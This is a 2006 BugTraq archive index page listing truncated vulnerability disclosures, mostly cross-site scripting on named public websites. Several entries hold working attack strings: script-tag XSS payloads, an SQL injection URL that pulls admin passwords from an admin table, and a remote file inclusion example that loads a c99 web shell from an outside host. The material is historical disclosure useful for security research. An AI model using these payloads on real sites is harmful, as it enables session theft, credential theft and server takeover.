BugTraq Mode:
(Page 1116 of 1748)  < Prev  1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121  Next >
PTT.yu Guestbook Vulnerability 2006-06-15
us3rg0d (us3r_g0d yahoo com)
==============================
PTT.yu Guestbook Vulnerability
==============================
Discovered by: us3rg0d
Mail: us3r_g0d (at) yahoo (dot) com
Site: www.us3rg0d.tk
www.cformatkrew.tk

greetz: m3t4b0l1c,Fu3g0,DELTA,Phantom,NeshYu,
skull_boy,Orwell,MetalBOY,[YesPeace],Intruder,

Loading_3rr0r,DrNoise
f

Re: MySQL DoS 2006-06-15
xhire herniklasika cz
MySQL 4.1.11 - affected too

Technorati.com - XSS with cookie disclosure 2006-06-14
luny youfucktard com
Technorati.com

Homepage:

http://www.technorati.com

Affected files:

login box

Creating a new account input boxes

Login box XSS vuln:

By escaping quotes and using script tags, we can accomplish our XSS example. For PoC try putting the following code in the login box:

">">">">'>'>'>"

43things.com - XSS with cookie disclosure 2006-06-14
luny youfucktard com
43things.com

Homepage:

http://www.43things.com

Affected files:

input box "I want to add to my list"

posting a comment

----------------------------------------

XSS vuln via input text of the box "I want to____"

When you add an item that's already on your list.

For a PoC we have s

Blogspot.com - XSS with cookie disclosure 2006-06-14
luny youfucktard com
Blogspot.com

Homepage:

http://www.blogspot.com

Affected files:

Blog input boxes

------------------------------------------

XSS vuln via Display name input box.

Blogger doesn't properly sanitize user input before generating it. For example, you can't use illegal characters in your u

Re: REMOTE FILE INCLUSION ( ALL ) 2006-06-14
eufrato gmail com
http://www.root-security.org/danger/boastMachine.txt

Was this tried on a running site? Or was this just source inspected?

in boastmachine folder, the below shouldn't be vulnerable with config.php declaring $bmc_dir.

vote.php

--------------------------------------

include_once dirname(__FILE_

RahnemaCo Remote File Inclusion Exploit 2006-06-14
Breeeeh hotmail com
=============================================

Found By: Breeeeh

Special for Site:- www.alshmokh.com

nono225-CrAzYCrAcKeR-mHOn-LoverHacker-rageh

Sw33t h4ck3r-BoNy_m-Root shill-LiNuX_rOOt

=============================================

Example:-

/shop/page.php?osCsid=http://yoursite/c99shell.t

SinFP 2.00 - a major release with many new features 2006-06-15
GomoR (bt gomor org)
Download: http://sourceforge.net/projects/sinfp/
Info: http://www.gomor.org/sinfp

Mailing list: https://lists.sourceforge.net/lists/listinfo/sinfp-discuss

NEWS FOR 2.00:

- complete rewrite
- sinfp.db completely reworked
- new tests based on comparison between probe and response (TCP seq/ac

Biblenet.net - XSS 2006-06-15
luny youfucktard com
Biblenet.net

Homepage:

http://www.biblenet.net

Affected files:

gettinginvolved.html

register.php

member.php

/library/index.html

-----------------------------------------

Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves

B3ta.com - XSS with cookie disclosure 2006-06-15
luny youfucktard com
B3ta.com

Homepage:

http://www.b3ta.com

Affected files:

Input boxes of your profile

XSS vuln with cookie disclosure via Profile: box.

Data isn't correctly sanitized before being generated. We can bypass the filters of the site one way by using img tags and converting our javascript to

Confixx <= 3 2006-06-14
kr4ch web de
p0w3r ~ curse-crew.de

Examples: [confixx]/ftplogin/[username]/ftp_index.php?path=<script>alert('p0w3r oWnZ')</script>

Confixx <= 3 2006-06-14
kr4ch web de
Software: Confixx <= 3

Vendor: http://www.swsoft.com/

Discovered by: p0w3r - curse-crew.de

Example: [confixx]/user/[username]/tools_ftp_pwaendern.php?account=<script>alert('p0w3r oWnZ')</script>

Ashop Search Module SQL injection 2006-06-13
entrika_fs yahoo com
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search

credits: EntriKa & The_BeKiR & erne

VampireFreaks journal XSS 2006-06-12
nanoymaster gmail com
yes the journal is exploitable as well

there seem to be no filters on the journal title so you can simply put: "><script>alert('XSS')</script>

also the other places where you can update your journal etc. don't filter anything

proof:

http://vampirefreaks.com/journal.php?u=NanoyMaster

webcrawler.com - XSS vulnerability in search-engine 2006-06-13
admin majorsecurity de
webcrawler.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://w

Palm.com - XSS vulnerability 2006-06-13
admin majorsecurity de
Palm.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://www.maj

Ratemylook.co.uk - XSS with session disclosure 2006-06-13
luny youfucktard com
Ratemylook.co.uk

Homepage:

http://www.ratemylook.co.uk

Affected files:

user.php4

top.php4

hot.php4

toponline.php4

------------------------------------------------

user.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SCRIPT

About.com - XSS with cookie disclosure 2006-06-13
luny youfucktard com
About.com

Homepage:

http://www.about.com

Affected files:

Search input box

fullsearch.htm

shortform.htm

forum.aspx

profile_center.asp

posting in the forum

-----------------------------------

Search input box xss vuln with cookie disclosure:

Works by putting the <script> tags in the

Macworld.com - XSS vulnerability 2006-06-13
admin majorsecurity de
Macworld.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Rated as: Low Risk

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" V

Ratescene.co.uk - XSS with session disclosure 2006-06-13
luny youfucktard com
Ratescene.co.uk

Homepage:

http://www.ratescene.co.uk

Affected files:

input boxes of editing your profile

------------------------------------------------

Profile input boxes XSS vuln with cookie disclosure:

Data isn't sanitized, try entering the code below:

<img src=javascript:aler

Facetherating.com - XSS & session disclosure 2006-06-13
luny youfucktard com
Facetherating.com

Homepage:

http://www.facetherating.com

Affected files:

showprofile.php

XSS vuln via showprofile.php:

The site does the typical filtering of adding backslashes to ' and " so we'll try something different this time and use a fromCharCode.

http://www.facetherating.co

Windowsitpro.com - XSS with cookie disclosure 2006-06-13
luny youfucktard com
Windowsitpro.com

Homepage:

http://www.windowsitpro.com

Affected files:

Search input box

Downloading whitepapers

Search input box xss vuln with cookie disclosure:

We convert our javascript to hex format so we don't receive the default "Your request cannot be processed as this time" err

Re: PHP Advanced Transfer Manager Download users password hashes 2006-06-13
jn hz6 de
The phpatm support forum (currently down) advises administrators to put a .htaccess into the users directory with the following content:

# no one gets in here!

order allow,deny

deny from all

Furthermore the website recommends to rename the "users" directory and change the corresponding var

animesuki XSS 2006-06-12
nanoymaster gmail com
example:

http://www.animesuki.com/doc.php/%3Cscript%3Ealert('hi')%3C/script%3E/

hints:

Cookiestealer, redirect people, <marquee>something</marquee>, general fun

Facerave.com - XSS & sessions disclosure 2006-06-13
luny youfucktard/com securityfocus com
Facerave.com

Homepage:

http://www.facerave.com

Affected files:

* Profile input boxes

- Self Description box

* Posting a blog entry

* Sending a message

index.php

------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML] 2006-06-13
botan linuxmail org
# Kurdish Security Advisory

# irc.gigachat.net #kurdhack

# http://www.milw0rm.com/exploits/1905

# Editor DHTML Scripting bugz

$url_path_editor = "$root_url/library/editor/";

$abs_path_editor = "$root/library/editor/";

?>

Proof Of Concept

http://www.site.com/[dcpath]/library/edit

Proof of concept: mybb 1.1.2 remote code execution 2006-06-13
Javier Olascoaga (jolascoaga 514 es)
514.es brings to you the proof of concept for mybb 1.1.2
http://secunia.com/secunia_research/2006-40/advisory/

GET it here: http://www.514.es/download/mybibi.pl

Best regards,

- J

alipager xss attack 2006-06-13
s3rv3r_hack3r yahoo com
Vendor : www.roostercode.com

version : all version!

BUG :

You can include all html tag ... in chat line !

for example : <script>alert("HI users!")</script>

+++++

ISO.org - XSS vulnerability 2006-06-13
admin majorsecurity de
ISO.org - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://www.majo

Copyright 2010, SecurityFocus